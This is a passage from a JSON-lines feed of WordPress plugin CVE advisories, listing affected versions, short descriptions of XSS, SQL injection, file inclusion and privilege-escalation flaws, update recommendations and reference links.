version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f972ab72-8e68-4ab3-aa7f-e2816de33554?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f972ab72-8e68-4ab3-aa7f-e2816de33554?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/tags\\\/1.1.38\\\/includes\\\/widgets\\\/team-members\\\/team-members.php#L1452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/tags\\\/1.1.38\\\/includes\\\/widgets\\\/team-members\\\/team-members.php#L1452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104212%40wpzoom-elementor-addons&new=3104212%40wpzoom-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104212%40wpzoom-elementor-addons&new=3104212%40wpzoom-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2923","slug":"magical-addons-for-elementor","versionImpact":"1.1.37","versionEndExcluding":"1.1.38","description":"The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's text effect widget in all versions up to, and including, 1.1.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078558%40magical-addons-for-elementor&new=3078558%40magical-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078558%40magical-addons-for-elementor&new=3078558%40magical-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f5ded-e8cb-4895-b938-889cea32f027?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f5ded-e8cb-4895-b938-889cea32f027?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5147","slug":"wpzoom-elementor-addons","versionImpact":"1.1.37","versionEndExcluding":"1.1.38","description":"The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.37 via the 'grid_style' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.1.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f006bb33-d017-445b-9c02-bd848c199671?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f006bb33-d017-445b-9c02-bd848c199671?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/wpzoom-elementor-ajax-posts-grid.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/wpzoom-elementor-ajax-posts-grid.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/wpzoom-elementor-ajax-posts-grid.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/wpzoom-elementor-ajax-posts-grid.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090236#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090236#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10020","slug":"heateor-social-login","versionImpact":"1.1.35","versionEndExcluding":"1.1.36","description":"The Heateor Social Login WordPress plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.1.35. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they have access to the email and the user does not have an already-existing account for the service returning the token. An attacker cannot authenticate as an administrator by default, but these accounts are also at risk if authentication for administrators has explicitly been allowed via the social login.","recommendation":"Update to version 1.1.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1d212b-75fe-4285-9c22-62b040e5a36c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1d212b-75fe-4285-9c22-62b040e5a36c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177729\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3236","slug":"easy-notify-lite","versionImpact":"1.1.32","versionEndExcluding":"1.1.33","description":"The Popup Builder WordPress plugin before 1.1.33 does not sanitise and escape some of its Notification fields, which could allow users such as contributor and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6c2da28-dc03-4bcc-a6c3-ee55a73861db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6c2da28-dc03-4bcc-a6c3-ee55a73861db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8716","slug":"xt-woo-ajax-add-to-cart","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The XT Ajax Add To Cart for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a003129b-4a31-40f8-a9b2-9d3a3286cabe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a003129b-4a31-40f8-a9b2-9d3a3286cabe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151911\\\/xt-woo-ajax-add-to-cart\\\/tags\\\/1.1.3\\\/xt-framework\\\/includes\\\/class-system-status.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151911\\\/xt-woo-ajax-add-to-cart\\\/tags\\\/1.1.3\\\/xt-framework\\\/includes\\\/class-system-status.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xt-woo-ajax-add-to-cart\\\/tags\\\/1.1.2\\\/xt-framework\\\/includes\\\/class-system-status.php#L786\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xt-woo-ajax-add-to-cart\\\/tags\\\/1.1.2\\\/xt-framework\\\/includes\\\/class-system-status.php#L786\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9025","slug":"sight","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The Sight \u2013 Professional Image Gallery and Portfolio plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handler_post_title' function in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to expose private, pending, trashed, and draft post titles. Successful exploitation requires the Elementor plugin to be installed and activated.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f889342e-03fb-44eb-b5cb-acf115a526c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f889342e-03fb-44eb-b5cb-acf115a526c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156405\\\/sight\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156405\\\/sight\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5574","slug":"wp-magazine-modules-lite","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Magazine Modules Lite plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.2 via the 'blockLayout' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeaf421-513b-4c9d-bd36-58af28c86bc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeaf421-513b-4c9d-bd36-58af28c86bc1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-magazine-modules-lite\\\/trunk\\\/includes\\\/src\\\/banner\\\/element.php#L1363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-magazine-modules-lite\\\/trunk\\\/includes\\\/src\\\/banner\\\/element.php#L1363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104046\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104046\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5860","slug":"icons-font-loader","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The Icons Font Loader plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a9fbe8-445a-478a-b6ce-cd669ccb6a2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a9fbe8-445a-478a-b6ce-cd669ccb6a2d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987296\\\/icons-font-loader\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987296\\\/icons-font-loader\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5674","slug":"wp-mail-log","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a23d0d-7ece-4870-a99d-f3f344be2d67\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a23d0d-7ece-4870-a99d-f3f344be2d67\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5672","slug":"wp-mail-log","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Mail Log WordPress plugin before 1.1.3 does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c1dff5b-bed3-49f8-96cc-1bc9abe78749\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c1dff5b-bed3-49f8-96cc-1bc9abe78749\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5645","slug":"wp-mail-log","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e392fb53-66e9-4c43-9e4f-f4ea7c561551\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e392fb53-66e9-4c43-9e4f-f4ea7c561551\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5644","slug":"wp-mail-log","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Mail Log WordPress plugin before 1.1.3 does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f1d623-0453-4103-a9aa-2d0ddb6eb69e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f1d623-0453-4103-a9aa-2d0ddb6eb69e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12072","slug":"analytics-cat","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The Analytics Cat \u2013 Google Analytics Made Easy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202743%40analytics-cat&new=3202743%40analytics-cat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202743%40analytics-cat&new=3202743%40analytics-cat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de64a12-0f73-40e9-bcd1-963dc6499ec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de64a12-0f73-40e9-bcd1-963dc6499ec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12701","slug":"wp-smart-import","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The WP Smart Import : Import any XML File to WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018 page\u2019 parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-smart-import\\\/trunk\\\/controller\\\/file_manage_controller.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-smart-import\\\/trunk\\\/controller\\\/file_manage_controller.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-smart-import\\\/trunk\\\/controller\\\/manage_controller.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-smart-import\\\/trunk\\\/controller\\\/manage_controller.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212009\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212009\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27153c13-6bdc-4873-8a05-8aab6ba4243d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27153c13-6bdc-4873-8a05-8aab6ba4243d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11761","slug":"legalweb-cloud","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The LegalWeb Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'legalweb-popup' shortcode in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198065\\\/legalweb-cloud\\\/trunk\\\/includes\\\/shortcodes\\\/class-legalweb-cloud-cookie-popup-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198065\\\/legalweb-cloud\\\/trunk\\\/includes\\\/shortcodes\\\/class-legalweb-cloud-cookie-popup-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034d3d52-cb77-40dd-85a1-81ca3bfd1f23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034d3d52-cb77-40dd-85a1-81ca3bfd1f23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6821","slug":"error-log-viewer","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The Error Log Viewer by BestWebSoft WordPress plugin before 1.1.3 contains a vulnerability that allows you to read and download PHP logs without authorization","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b1a998d-c97c-4305-b12a-69e29408ebd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b1a998d-c97c-4305-b12a-69e29408ebd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54321","slug":"hive-support","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Hive Support Hive Support \u2013 WordPress Help Desk allows Cross Site Request Forgery.This issue affects Hive Support \u2013 WordPress Help Desk: from n\/a through 1.1.2.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54304","slug":"hive-support","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hive Support Hive Support \u2013 WordPress Help Desk allows SQL Injection.This issue affects Hive Support \u2013 WordPress Help Desk: from n\/a through 1.1.2.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2779","slug":"insert-headers-and-footers-script","versionImpact":"1.1.2","versionEndExcluding":"1.1.3","description":"The Insert Headers and Footers Code \u2013 HT Script plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 1\/true on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny access to legitimate users or be used to set some values to true, such as registration.","recommendation":"Update to version 1.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-headers-and-footers-script\\\/tags\\\/1.1.2\\\/admin\\\/class-rating-notice.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-headers-and-footers-script\\\/tags\\\/1.1.2\\\/admin\\\/class-rating-notice.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75bc2295-bf9a-430f-92b7-d380eed6df11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75bc2295-bf9a-430f-92b7-d380eed6df11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5730","slug":"contact-form-lite","versionImpact":"1.1.28","versionEndExcluding":"1.1.29","description":"The Contact Form Plugin WordPress plugin before 1.1.29 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1e7f423-f981-413c-a99a-e5927fc1cd0c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1e7f423-f981-413c-a99a-e5927fc1cd0c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0371","slug":"embedalbum-pro","versionEndExcluding":"1.1.28","description":"The EmbedSocial WordPress plugin before 1.1.28 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b6381cd-fa31-4cc7-8b42-063a4c545577\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b6381cd-fa31-4cc7-8b42-063a4c545577\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4315","slug":"cubewp-framework","versionImpact":"1.1.23","versionEndExcluding":"1.1.24","description":"The CubeWP \u2013 All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.23. This is due to the plugin allowing a user to update arbitrary user meta through the update_user_meta() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","recommendation":"Update to version 1.1.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cubewp-framework\\\/tags\\\/1.1.23\\\/cube\\\/classes\\\/class-cubewp-rest-api.php#L691\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cubewp-framework\\\/tags\\\/1.1.23\\\/cube\\\/classes\\\/class-cubewp-rest-api.php#L691\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306925\\\/cubewp-framework#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306925\\\/cubewp-framework#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430b7e72-72b8-4cf8-99f4-ee1d1d4b4f24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/430b7e72-72b8-4cf8-99f4-ee1d1d4b4f24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13514","slug":"b-slider","versionImpact":"1.1.23","versionEndExcluding":"1.1.24","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.5 via the 'bsb-slider' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private posts that they should not have access to.","recommendation":"Update to version 1.1.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228644\\\/b-slider\\\/trunk\\\/custom-post.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228644\\\/b-slider\\\/trunk\\\/custom-post.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ab9274-35c8-473b-accb-602e53816528?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ab9274-35c8-473b-accb-602e53816528?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12274","slug":"bookingpress-appointment-booking","versionImpact":"1.1.22","versionEndExcluding":"1.1.23","description":"The Appointment Booking Calendar Plugin and Scheduling Plugin  WordPress plugin before 1.1.23 export settings functionality exports data to a public folder, with an easily guessable file name, allowing unauthenticated attackers to access the exported files (if they exist).","recommendation":"Update to version 1.1.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3176c9a-63f3-4a28-a8a7-8abb2b4100ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3176c9a-63f3-4a28-a8a7-8abb2b4100ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11726","slug":"bookingpress-appointment-booking","versionImpact":"1.1.21","versionEndExcluding":"1.1.22","description":"The Appointment Booking Calendar Plugin and Scheduling Plugin \u2013 BookingPress plugin for WordPress is vulnerable to SQL Injection via the 'category' parameter of the 'bookingpress_form' shortcode in all versions up to, and including, 1.1.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.1.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206780\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206780\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d081b89-1b98-4f4f-8728-d1ea676d7afd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d081b89-1b98-4f4f-8728-d1ea676d7afd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
